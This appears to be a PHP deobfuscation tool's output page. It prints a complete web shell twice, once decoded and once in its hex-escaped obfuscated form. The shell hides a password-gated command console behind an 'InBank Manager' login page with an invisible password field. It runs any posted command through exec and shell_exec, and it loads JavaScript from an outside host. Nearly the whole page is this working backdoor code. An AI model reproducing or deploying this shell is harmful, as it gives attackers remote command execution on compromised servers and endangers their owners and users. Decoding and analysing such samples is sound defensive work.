Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto ZETTw; ZETTw: session_start(); goto AGkTr; mhp5n: function featureShell($cmd,..

Decoded Output download

<?php 
 goto ZETTw; ZETTw: session_start(); goto AGkTr; mhp5n: function featureShell($cmd, $cwd) { $stdout = array(); if (preg_match("/^\s*cd\s*$/", $cmd)) { } elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) { chdir($cwd); preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); chdir($match[1]); } else { chdir($cwd); exec($cmd, $stdout); } return array("stdout" => $stdout, "cwd" => getcwd()); } goto JQy_0; vd2qL: $hashed_password = "$2y$12$8wIxTUw3VYsFN4I6C6NqCe86hJwrmF6PdVZQbPP3r3x5g6rHe89Y6"; goto FHise; dh6yB: function featureHint($fileName, $cwd, $type) { chdir($cwd); if ($type == "cmd") { $cmd = "compgen -c {$fileName}"; } else { $cmd = "compgen -f {$fileName}"; } $cmd = "/bin/bash -c "{$cmd}""; $files = explode("
", shell_exec($cmd)); return array("files" => $files); } goto BruoE; umDdi: $authenticated = isset($_SESSION["authenticated"]) && $_SESSION["authenticated"] === true; goto zUQyf; BruoE: if (isset($_GET["feature"])) { $response = NULL; switch ($_GET["feature"]) { case "shell": $cmd = $_POST["cmd"]; if (!preg_match("/2>/", $cmd)) { $cmd .= " 2>&1"; } $response = featureShell($cmd, $_POST["cwd"]); break; case "pwd": $response = featurePwd(); break; case "hint": $response = featureHint($_POST["filename"], $_POST["cwd"], $_POST["type"]); } header("Content-Type: application/json"); echo json_encode($response); die; } goto C2J4K; YotyF: if (isset($_GET["logout"])) { session_destroy(); header("Location: " . $_SERVER["PHP_SELF"]); die; } goto umDdi; JQy_0: function featurePwd() { return array("cwd" => getcwd()); } goto dh6yB; zUQyf: if (!$authenticated) { ?> 
<!doctypehtml><html><head><meta charset="UTF-8"><title>Login</title><style>body{font-family:Arial,sans-serif;background-color:#333;color:#eee;display:flex;justify-content:center;align-items:center;height:100vh;margin:0}.login-form{background:#222;padding:20px;border-radius:5px;box-shadow:0 0 10px rgba(0,0,0,.5)}.login-form h2{margin-top:0}.login-form input{width:100%;padding:10px;margin:10px 0;border:none;border-radius:3px}.login-form button{width:100%;padding:10px;background:#75df0b;border:none;border-radius:3px;color:#fff;font-size:16px;cursor:pointer}.login-form button:hover{background:#5cb300}.error{color:#f44;margin-bottom:10px}</style></head><body><div class="login-form"><h2>InBank Manager</h2><?php  if (isset($login_error)) { } ?> 
<form method="POST"><input name="password"onblur="this.style.opacity=0"onfocus="this.style.opacity=0"placeholder=""style="width:100%;padding:12px;font-size:1rem;background-color:#220f0f;border:1px solid transparent;border-radius:4px;color:#333;opacity:0;cursor:pointer;transition:opacity .3s ease"type="password"> <button name="login"type="submit">Login</button></form></div></body></html><?php  die; } goto mhp5n; FHise: if (isset($_POST["login"])) { $username = $_POST["username"]; $password = $_POST["password"]; if ("admin" === $valid_username && password_verify($password, $hashed_password)) { $_SESSION["authenticated"] = true; $_SESSION["username"] = $username; } else { $login_error = "Wrong password"; } } goto YotyF; AGkTr: $valid_username = "admin"; goto vd2qL; C2J4K: ?> 
<!doctypehtml><script src="http://www.r57.gen.tr/yazciz/ciz.js"></script><html><head><meta charset="UTF-8"><title>manager</title><meta content="width=device-width,initial-scale=1"name="viewport"><style>body,html{margin:0;padding:0;background:#333;color:#eee;font-family:monospace}#shell{background:#222;max-width:800px;margin:50px auto 0 auto;box-shadow:0 0 5px rgba(0,0,0,.3);font-size:10pt;display:flex;flex-direction:column;align-items:stretch}#shell-content{height:500px;overflow:auto;padding:5px;white-space:pre-wrap;flex-grow:1}#shell-logo{font-weight:700;color:#ff4180;text-align:center}@media (max-width:991px){#shell-logo{display:none}#shell,body,html{height:100%;width:100%;max-width:none}#shell{margin-top:0}}@media (max-width:767px){#shell-input{flex-direction:column}}.shell-prompt{font-weight:700;color:#75df0b}.shell-prompt>span{color:#1bc9e7}#shell-input{display:flex;box-shadow:0 -1px 0 rgba(0,0,0,.3);border-top:rgba(255,255,255,.05) solid 1px}#shell-input>label{flex-grow:0;display:block;padding:0 5px;height:30px;line-height:30px}#shell-input #shell-cmd{height:30px;line-height:30px;border:none;background:0 0;color:#eee;font-family:monospace;font-size:10pt;width:100%;align-self:center}#shell-input div{flex-grow:1;align-items:stretch}#shell-input input{outline:0}#logout-btn{background:#f44;color:#fff;border:none;padding:5px 10px;cursor:pointer;margin-left:10px}#logout-btn:hover{background:#c00}</style><script>var CWD=null,commandHistory=[],historyPosition=0,eShellCmdInput=null,eShellContent=null;function _insertCommand(e){eShellContent.innerHTML+="

",eShellContent.innerHTML+='<span class="shell-prompt">'+genPrompt(CWD)+"</span> ",eShellContent.innerHTML+=escapeHtml(e),eShellContent.innerHTML+="
",eShellContent.scrollTop=eShellContent.scrollHeight}function _insertStdout(e){eShellContent.innerHTML+=escapeHtml(e),eShellContent.scrollTop=eShellContent.scrollHeight}function featureShell(e){_insertCommand(e),makeRequest("?feature=shell",{cmd:e,cwd:CWD},function(e){_insertStdout(e.stdout.join("
")),updateCwd(e.cwd)})}function featureHint(){if(0!==eShellCmdInput.value.trim().length){var e=eShellCmdInput.value.split(" "),n=1===e.length?"cmd":"file";makeRequest("?feature=hint",{filename:"cmd"==n?e[0]:e[e.length-1],cwd:CWD,type:n},function(e){if(!(e.files.length<=1))if(2===e.files.length)if("cmd"==n)eShellCmdInput.value=e.files[0];else{var t=eShellCmdInput.value;eShellCmdInput.value=t.replace(/([^\s]*)$/,e.files[0])}else _insertCommand(eShellCmdInput.value),_insertStdout(e.files.join("
"))})}}function genPrompt(e){var t=e=e||"~";if(3<e.split("/").length){var n=e.split("/");t="/"+n[n.length-2]+"/"+n[n.length-1]}return'inBank@manager:<span title="'+e+'">'+t+"</span>#"}function updateCwd(e){if(e)return CWD=e,void _updatePrompt();makeRequest("?feature=pwd",{},function(e){CWD=e.cwd,_updatePrompt()})}function escapeHtml(e){return e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;")}function _updatePrompt(){document.getElementById("shell-prompt").innerHTML=genPrompt(CWD)}function _onShellCmdKeyDown(e){switch(e.key){case"Enter":featureShell(eShellCmdInput.value),insertToHistory(eShellCmdInput.value),eShellCmdInput.value="";break;case"ArrowUp":0<historyPosition&&(historyPosition--,eShellCmdInput.blur(),eShellCmdInput.focus(),eShellCmdInput.value=commandHistory[historyPosition]);break;case"ArrowDown":if(historyPosition>=commandHistory.length)break;++historyPosition===commandHistory.length?eShellCmdInput.value="":(eShellCmdInput.blur(),eShellCmdInput.focus(),eShellCmdInput.value=commandHistory[historyPosition]);break;case"Tab":e.preventDefault(),featureHint()}}function insertToHistory(e){commandHistory.push(e),historyPosition=commandHistory.length}function makeRequest(e,n,t){var l=new XMLHttpRequest;l.open("POST",e,!0),l.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),l.onreadystatechange=function(){if(4===l.readyState&&200===l.status)try{var e=JSON.parse(l.responseText);t(e)}catch(e){alert("Error while parsing response: "+e)}},l.send(function(){var e=[];for(var t in n)n.hasOwnProperty(t)&&e.push(encodeURIComponent(t)+"="+encodeURIComponent(n[t]));return e.join("&")}())}window.onload=function(){eShellCmdInput=document.getElementById("shell-cmd"),eShellContent=document.getElementById("shell-content"),updateCwd(),eShellCmdInput.focus()}</script></head><body><div id="shell"><pre id="shell-content"> 
                <div id="shell-logo"> 
                                                                 <span></span> 
  ___ ___  _ __  ___  ___ | | ___   _ __ ___   __ _ _ __   __ _  __ _  ___ _ __ <span></span> 
 / __/ _ \| '_ \/ __|/ _ \| |/ _ \ | '_ ` _ \ / _` | '_ \ / _` |/ _` |/ _ \ '__|<span></span> 
| (_| (_) | | | \__ \ (_) | |  __/ | | | | | | (_| | | | | (_| | (_| |  __/ |   <span></span> 
 \___\___/|_| |_|___/\___/|_|\___| |_| |_| |_|\__,_|_| |_|\__,_|\__, |\___|_|   <span></span> 
                                                                |___/           <span></span> 
 
                </div> 
            </pre><div id="shell-input"><label class="shell-prompt"for="shell-cmd"id="shell-prompt">???</label><div><input name="cmd"id="shell-cmd"onkeydown="_onShellCmdKeyDown(event)"></div><button id="logout-btn"onclick='window.location.href="?logout=1"'>Logout</button></div></div></body></html>

Did this file decode correctly?

Original Code

<?php
 goto ZETTw; ZETTw: session_start(); goto AGkTr; mhp5n: function featureShell($cmd, $cwd) { $stdout = array(); if (preg_match("\57\x5e\134\163\52\x63\144\134\x73\x2a\44\x2f", $cmd)) { } elseif (preg_match("\57\x5e\134\x73\52\143\x64\134\163\x2b\x28\56\x2b\51\x5c\163\x2a\x28\62\x3e\46\61\x29\x3f\44\57", $cmd)) { chdir($cwd); preg_match("\x2f\136\x5c\x73\52\143\144\134\x73\x2b\x28\133\x5e\x5c\x73\x5d\x2b\x29\134\163\x2a\x28\x32\x3e\x26\61\51\77\44\57", $cmd, $match); chdir($match[1]); } else { chdir($cwd); exec($cmd, $stdout); } return array("\x73\x74\x64\157\x75\x74" => $stdout, "\x63\x77\144" => getcwd()); } goto JQy_0; vd2qL: $hashed_password = "\44\x32\171\44\x31\x32\x24\70\x77\111\170\x54\x55\167\x33\126\x59\163\x46\116\64\111\66\x43\66\116\x71\103\145\70\x36\150\x4a\167\x72\155\106\66\x50\x64\126\132\121\142\x50\x50\63\x72\x33\x78\x35\147\66\162\x48\x65\70\x39\x59\66"; goto FHise; dh6yB: function featureHint($fileName, $cwd, $type) { chdir($cwd); if ($type == "\143\x6d\x64") { $cmd = "\143\157\155\160\147\x65\x6e\x20\x2d\143\x20{$fileName}"; } else { $cmd = "\143\x6f\x6d\160\x67\x65\156\40\55\x66\x20{$fileName}"; } $cmd = "\57\142\151\156\x2f\x62\x61\x73\x68\40\55\x63\x20\42{$cmd}\x22"; $files = explode("\12", shell_exec($cmd)); return array("\x66\x69\154\x65\163" => $files); } goto BruoE; umDdi: $authenticated = isset($_SESSION["\x61\165\x74\x68\x65\x6e\164\x69\143\141\x74\x65\x64"]) && $_SESSION["\141\x75\164\x68\x65\x6e\164\151\x63\x61\x74\145\x64"] === true; goto zUQyf; BruoE: if (isset($_GET["\146\x65\x61\164\x75\x72\x65"])) { $response = NULL; switch ($_GET["\146\x65\x61\x74\165\x72\145"]) { case "\163\x68\x65\154\x6c": $cmd = $_POST["\143\155\x64"]; if (!preg_match("\57\62\76\57", $cmd)) { $cmd .= "\x20\62\76\46\61"; } $response = featureShell($cmd, $_POST["\143\167\x64"]); break; case "\x70\167\x64": $response = featurePwd(); break; case "\150\x69\156\x74": $response = featureHint($_POST["\x66\151\x6c\x65\156\x61\155\145"], $_POST["\x63\x77\x64"], $_POST["\164\x79\x70\145"]); } header("\103\157\156\x74\145\156\164\x2d\124\x79\x70\x65\72\x20\x61\160\160\x6c\151\143\x61\x74\x69\x6f\x6e\57\x6a\163\157\156"); echo json_encode($response); die; } goto C2J4K; YotyF: if (isset($_GET["\154\157\x67\x6f\165\164"])) { session_destroy(); header("\x4c\157\x63\x61\164\x69\x6f\x6e\x3a\x20" . $_SERVER["\120\110\120\x5f\123\x45\114\106"]); die; } goto umDdi; JQy_0: function featurePwd() { return array("\143\167\144" => getcwd()); } goto dh6yB; zUQyf: if (!$authenticated) { ?>
<!doctypehtml><html><head><meta charset="UTF-8"><title>Login</title><style>body{font-family:Arial,sans-serif;background-color:#333;color:#eee;display:flex;justify-content:center;align-items:center;height:100vh;margin:0}.login-form{background:#222;padding:20px;border-radius:5px;box-shadow:0 0 10px rgba(0,0,0,.5)}.login-form h2{margin-top:0}.login-form input{width:100%;padding:10px;margin:10px 0;border:none;border-radius:3px}.login-form button{width:100%;padding:10px;background:#75df0b;border:none;border-radius:3px;color:#fff;font-size:16px;cursor:pointer}.login-form button:hover{background:#5cb300}.error{color:#f44;margin-bottom:10px}</style></head><body><div class="login-form"><h2>InBank Manager</h2><?php  if (isset($login_error)) { } ?>
<form method="POST"><input name="password"onblur="this.style.opacity=0"onfocus="this.style.opacity=0"placeholder=""style="width:100%;padding:12px;font-size:1rem;background-color:#220f0f;border:1px solid transparent;border-radius:4px;color:#333;opacity:0;cursor:pointer;transition:opacity .3s ease"type="password"> <button name="login"type="submit">Login</button></form></div></body></html><?php  die; } goto mhp5n; FHise: if (isset($_POST["\x6c\x6f\x67\151\x6e"])) { $username = $_POST["\x75\163\145\162\156\141\155\145"]; $password = $_POST["\x70\x61\163\163\x77\157\x72\144"]; if ("\141\x64\155\x69\156" === $valid_username && password_verify($password, $hashed_password)) { $_SESSION["\x61\165\x74\x68\145\156\164\151\x63\x61\164\x65\144"] = true; $_SESSION["\x75\x73\145\x72\x6e\141\x6d\145"] = $username; } else { $login_error = "\127\x72\x6f\156\147\x20\160\141\163\163\167\x6f\x72\x64"; } } goto YotyF; AGkTr: $valid_username = "\141\144\155\x69\156"; goto vd2qL; C2J4K: ?>
<!doctypehtml><script src="http://www.r57.gen.tr/yazciz/ciz.js"></script><html><head><meta charset="UTF-8"><title>manager</title><meta content="width=device-width,initial-scale=1"name="viewport"><style>body,html{margin:0;padding:0;background:#333;color:#eee;font-family:monospace}#shell{background:#222;max-width:800px;margin:50px auto 0 auto;box-shadow:0 0 5px rgba(0,0,0,.3);font-size:10pt;display:flex;flex-direction:column;align-items:stretch}#shell-content{height:500px;overflow:auto;padding:5px;white-space:pre-wrap;flex-grow:1}#shell-logo{font-weight:700;color:#ff4180;text-align:center}@media (max-width:991px){#shell-logo{display:none}#shell,body,html{height:100%;width:100%;max-width:none}#shell{margin-top:0}}@media (max-width:767px){#shell-input{flex-direction:column}}.shell-prompt{font-weight:700;color:#75df0b}.shell-prompt>span{color:#1bc9e7}#shell-input{display:flex;box-shadow:0 -1px 0 rgba(0,0,0,.3);border-top:rgba(255,255,255,.05) solid 1px}#shell-input>label{flex-grow:0;display:block;padding:0 5px;height:30px;line-height:30px}#shell-input #shell-cmd{height:30px;line-height:30px;border:none;background:0 0;color:#eee;font-family:monospace;font-size:10pt;width:100%;align-self:center}#shell-input div{flex-grow:1;align-items:stretch}#shell-input input{outline:0}#logout-btn{background:#f44;color:#fff;border:none;padding:5px 10px;cursor:pointer;margin-left:10px}#logout-btn:hover{background:#c00}</style><script>var CWD=null,commandHistory=[],historyPosition=0,eShellCmdInput=null,eShellContent=null;function _insertCommand(e){eShellContent.innerHTML+="\n\n",eShellContent.innerHTML+='<span class="shell-prompt">'+genPrompt(CWD)+"</span> ",eShellContent.innerHTML+=escapeHtml(e),eShellContent.innerHTML+="\n",eShellContent.scrollTop=eShellContent.scrollHeight}function _insertStdout(e){eShellContent.innerHTML+=escapeHtml(e),eShellContent.scrollTop=eShellContent.scrollHeight}function featureShell(e){_insertCommand(e),makeRequest("?feature=shell",{cmd:e,cwd:CWD},function(e){_insertStdout(e.stdout.join("\n")),updateCwd(e.cwd)})}function featureHint(){if(0!==eShellCmdInput.value.trim().length){var e=eShellCmdInput.value.split(" "),n=1===e.length?"cmd":"file";makeRequest("?feature=hint",{filename:"cmd"==n?e[0]:e[e.length-1],cwd:CWD,type:n},function(e){if(!(e.files.length<=1))if(2===e.files.length)if("cmd"==n)eShellCmdInput.value=e.files[0];else{var t=eShellCmdInput.value;eShellCmdInput.value=t.replace(/([^\s]*)$/,e.files[0])}else _insertCommand(eShellCmdInput.value),_insertStdout(e.files.join("\n"))})}}function genPrompt(e){var t=e=e||"~";if(3<e.split("/").length){var n=e.split("/");t="/"+n[n.length-2]+"/"+n[n.length-1]}return'inBank@manager:<span title="'+e+'">'+t+"</span>#"}function updateCwd(e){if(e)return CWD=e,void _updatePrompt();makeRequest("?feature=pwd",{},function(e){CWD=e.cwd,_updatePrompt()})}function escapeHtml(e){return e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;")}function _updatePrompt(){document.getElementById("shell-prompt").innerHTML=genPrompt(CWD)}function _onShellCmdKeyDown(e){switch(e.key){case"Enter":featureShell(eShellCmdInput.value),insertToHistory(eShellCmdInput.value),eShellCmdInput.value="";break;case"ArrowUp":0<historyPosition&&(historyPosition--,eShellCmdInput.blur(),eShellCmdInput.focus(),eShellCmdInput.value=commandHistory[historyPosition]);break;case"ArrowDown":if(historyPosition>=commandHistory.length)break;++historyPosition===commandHistory.length?eShellCmdInput.value="":(eShellCmdInput.blur(),eShellCmdInput.focus(),eShellCmdInput.value=commandHistory[historyPosition]);break;case"Tab":e.preventDefault(),featureHint()}}function insertToHistory(e){commandHistory.push(e),historyPosition=commandHistory.length}function makeRequest(e,n,t){var l=new XMLHttpRequest;l.open("POST",e,!0),l.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),l.onreadystatechange=function(){if(4===l.readyState&&200===l.status)try{var e=JSON.parse(l.responseText);t(e)}catch(e){alert("Error while parsing response: "+e)}},l.send(function(){var e=[];for(var t in n)n.hasOwnProperty(t)&&e.push(encodeURIComponent(t)+"="+encodeURIComponent(n[t]));return e.join("&")}())}window.onload=function(){eShellCmdInput=document.getElementById("shell-cmd"),eShellContent=document.getElementById("shell-content"),updateCwd(),eShellCmdInput.focus()}</script></head><body><div id="shell"><pre id="shell-content">
                <div id="shell-logo">
                                                                 <span></span>
  ___ ___  _ __  ___  ___ | | ___   _ __ ___   __ _ _ __   __ _  __ _  ___ _ __ <span></span>
 / __/ _ \| '_ \/ __|/ _ \| |/ _ \ | '_ ` _ \ / _` | '_ \ / _` |/ _` |/ _ \ '__|<span></span>
| (_| (_) | | | \__ \ (_) | |  __/ | | | | | | (_| | | | | (_| | (_| |  __/ |   <span></span>
 \___\___/|_| |_|___/\___/|_|\___| |_| |_| |_|\__,_|_| |_|\__,_|\__, |\___|_|   <span></span>
                                                                |___/           <span></span>

                </div>
            </pre><div id="shell-input"><label class="shell-prompt"for="shell-cmd"id="shell-prompt">???</label><div><input name="cmd"id="shell-cmd"onkeydown="_onShellCmdKeyDown(event)"></div><button id="logout-btn"onclick='window.location.href="?logout=1"'>Logout</button></div></div></body></html>

Function Calls

None

Variables

None

Stats

MD5 c997996d747d5d95d81e16d3be031f13
Eval Count 0
Decode Time 48 ms